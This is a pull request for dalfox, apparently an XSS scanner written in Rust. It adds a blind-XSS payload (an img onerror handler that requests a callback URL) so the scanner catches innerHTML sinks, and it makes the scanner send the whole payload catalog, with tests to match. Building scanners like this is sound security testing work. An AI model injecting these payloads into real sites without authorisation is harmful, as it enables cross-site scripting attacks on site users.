### PR TITLE
fix(blind): cover innerHTML DOM sinks, and send the whole payload catalog

### DIFF
--- a/src/payload/xss_blind.rs
+++ b/src/payload/xss_blind.rs
@@ -1,6 +1,21 @@
+/// Built-in blind-XSS templates. `{}` is replaced with the per-payload callback
+/// URL; a callback hitting the OOB server means the injected markup was parsed
+/// and executed on some victim's browser.
+///
+/// The `<script src>` shapes are the classic blind vectors, but they only fire
+/// when the payload is written into the document as markup the parser sees —
+/// server-reflected HTML, or `document.write`. A browser does **not** run a
+/// `<script src>` inserted through `innerHTML`, so a stored DOM-XSS whose sink
+/// is `innerHTML` never called home. The `<img src=x onerror>` shape closes
+/// that gap: `onerror` handlers on an `<img>` inserted via `innerHTML` do fire,
+/// and the handler requests the callback — which also proves the handler
+/// executed, not merely that the tag rendered. `new Image()` (rather than
+/// re-assigning `this.src`) avoids an onerror loop when the callback response
+/// isn't a decodable image.
 pub const XSS_BLIND_PAYLOADS: &[&str] = &[
     "\"'><script src={}></script>",
     "-->\"'></script><script src={}></script>",
+    "\"'><img src=x onerror=\"new Image().src='{}'\">",
 ];
 
 #[cfg(test)]

--- a/src/payload/xss_blind/tests.rs
+++ b/src/payload/xss_blind/tests.rs
@@ -17,14 +17,30 @@ fn test_blind_payloads_contain_callback_placeholder() {
 }
 
 #[test]
-fn test_blind_payloads_contain_script_tag() {
+fn test_blind_payloads_load_callback_remotely() {
+    // Every shape must reach the callback host: the `<script src>` vectors load
+    // it as a remote script; the DOM-sink vector requests it from an `onerror`
+    // handler. Both prove the injected markup executed when the callback fires.
     for p in XSS_BLIND_PAYLOADS {
         assert!(
-            p.contains("<script"),
-            "blind payload must use script tag for remote loading: {}",
+            p.contains("<script") || p.contains("onerror="),
+            "blind payload must load the callback remotely (script src or onerror): {}",
             p
         );
     }
+}
+
+/// At least one built-in must fire when the sink is `innerHTML`, where a
+/// `<script src>` is inert — the case a stored DOM-XSS lands in. Regression
+/// guard for issue #1238's follow-up.
+#[test]
+fn test_blind_payloads_cover_innerhtml_dom_sink() {
+    assert!(
+        XSS_BLIND_PAYLOADS
+            .iter()
+            .any(|p| p.contains("<img") && p.contains("onerror=")),
+        "no blind payload fires in an innerHTML DOM sink"
+    );
 }
 
 #[test]

--- a/src/scanning/xss_blind.rs
+++ b/src/scanning/xss_blind.rs
@@ -132,11 +132,20 @@ fn build_blind_templates(custom_template_path: Option<&str>) -> Vec<String> {
             }
         }
     }
-    let template = crate::payload::XSS_BLIND_PAYLOADS
-        .first()
-        .copied()
-        .unwrap_or("\"'><script src={}></script>");
-    vec![template.to_string()]
+    // Send every built-in shape, not just the first. The catalog carries
+    // distinct breakout contexts (script-src, comment-then-script, and the
+    // `<img onerror>` DOM-sink vector), and only the first was ever reaching
+    // the wire — so the comment-breakout and innerHTML-compatible payloads were
+    // defined but never sent. Blind scanning is opt-in and low-volume, so the
+    // extra requests per param are a worthwhile trade for the added coverage.
+    let templates: Vec<String> = crate::payload::XSS_BLIND_PAYLOADS
+        .iter()
+        .map(|t| t.to_string())
+        .collect();
+    if templates.is_empty() {
+        return vec!["\"'><script src={}></script>".to_string()];
+    }
+    templates
 }
 
 /// Backward-compatible entry: inject a blind payload built from a single static

--- a/src/scanning/xss_blind/tests.rs
+++ b/src/scanning/xss_blind/tests.rs
@@ -420,13 +420,34 @@ async fn test_blind_scanning_sends_requests_for_query_body_header_and_cookie() {
     blind_scanning(&target, "https://cb.example", None).await;
 
     let records = state.lock().await.clone();
-    assert_eq!(records.len(), 4);
+    // 4 params (query, body, header, cookie) × every built-in template.
+    assert_eq!(records.len(), 4 * crate::payload::XSS_BLIND_PAYLOADS.len());
     assert!(records.iter().all(|r| r.method == "POST"));
     assert!(records.iter().any(|r| {
         r.uri.contains("cb.example")
             || r.body.contains("cb.example")
             || r.headers.values().any(|v| v.contains("cb.example"))
     }));
+
+    // The innerHTML DOM-sink vector must actually reach the wire, callback
+    // filled in — an `<img onerror>` that requests the callback host. This is
+    // the shape a stored DOM-XSS needs; a `<script src>` would be inert there.
+    let all_payloads: String = records
+        .iter()
+        .map(|r| format!("{} {}", r.uri, r.body))
+        .collect::<Vec<_>>()
+        .join("\n");
+    // Normalize the space encoding (form bodies use `+`, query strings `%20`)
+    // so the assertion reads against the payload shape, not its wire encoding.
+    let normalized = urlencoding::decode(&all_payloads)
+        .map(|c| c.into_owned())
+        .unwrap_or(all_payloads)
+        .replace('+', " ");
+    assert!(
+        normalized.contains("<img src=x onerror=") && normalized.contains("cb.example"),
+        "innerHTML DOM-sink blind payload not sent with callback; got:\n{}",
+        normalized
+    );
 }
 
 // ── pure-helper unit tests ──────────────────────────────────────────
@@ -529,6 +550,19 @@ fn build_blind_templates_falls_back_to_builtin_without_path() {
     assert!(
         templates.iter().all(|t| t.contains("{}")),
         "every built-in template keeps the normalized callback marker"
+    );
+    // The whole catalog reaches the wire — not just the first entry, which was
+    // the prior behaviour that left the other shapes defined-but-unsent.
+    assert_eq!(
+        templates.len(),
+        crate::payload::XSS_BLIND_PAYLOADS.len(),
+        "default path must send every built-in blind shape"
+    );
+    assert!(
+        templates
+            .iter()
+            .any(|t| t.contains("<img") && t.contains("onerror=")),
+        "default path must include the innerHTML DOM-sink vector"
     );
 }
 


### PR DESCRIPTION
Follow-up from the #1238 discussion. While confirming that out-of-band callbacks are dalfox's one runtime-observation path, two defects in the blind-XSS payloads turned up.

## `<script src>` is inert in an innerHTML sink

Every built-in blind payload was a `<script src={callback}>` shape. Those fire when the markup is parsed as HTML — server-reflected output, or `document.write` — but **a browser does not execute a `<script src>` inserted through `innerHTML`**. So a stored XSS whose sink is `innerHTML` (the common client-side case) never called home, and blind scanning silently missed the exact class of bug that has no other confirmation path.

Added `"'><img src=x onerror="new Image().src='{}'">`. An `<img onerror>` inserted via `innerHTML` *does* fire, and requesting the callback from inside the handler proves the handler executed — the same strength of evidence the `<script src>` fetch gives. `new Image()` (rather than re-assigning `this.src`) avoids an onerror loop if the callback response isn't a decodable image.

## Only the first catalog entry was ever sent

`build_blind_templates` returned `vec![XSS_BLIND_PAYLOADS.first()]`, so the comment-breakout variant (`-->"'></script><script src=…>`) was defined, tested, and **never put on the wire** — and any payload added to the catalog, including the fix above, would have been dead too. It now sends the whole catalog. Blind scanning is opt-in and low-volume, so the extra requests per param (3 shapes now) are worth the coverage.

## Notes

- **OOB correlation is unaffected.** It keys on the per-payload callback nonce minted into the URL (`build_send_payloads` → `session.mint_url()` → `registry.record(nonce, …)`), not on the payload text, so the new shape correlates like any other.
- **No behaviour change for reflected/DOM scanning** — this is purely the `--blind` / `--blind-oob` payload set.

## Verification

- 1941 lib tests + integration bins green; clippy and fmt clean
- New tests: the catalog covers an innerHTML `<img onerror>` vector and every shape loads the callback remotely; the default builder sends the full catalog; and an end-to-end blind scan puts the `<img onerror>` payload on the wire with the callback filled in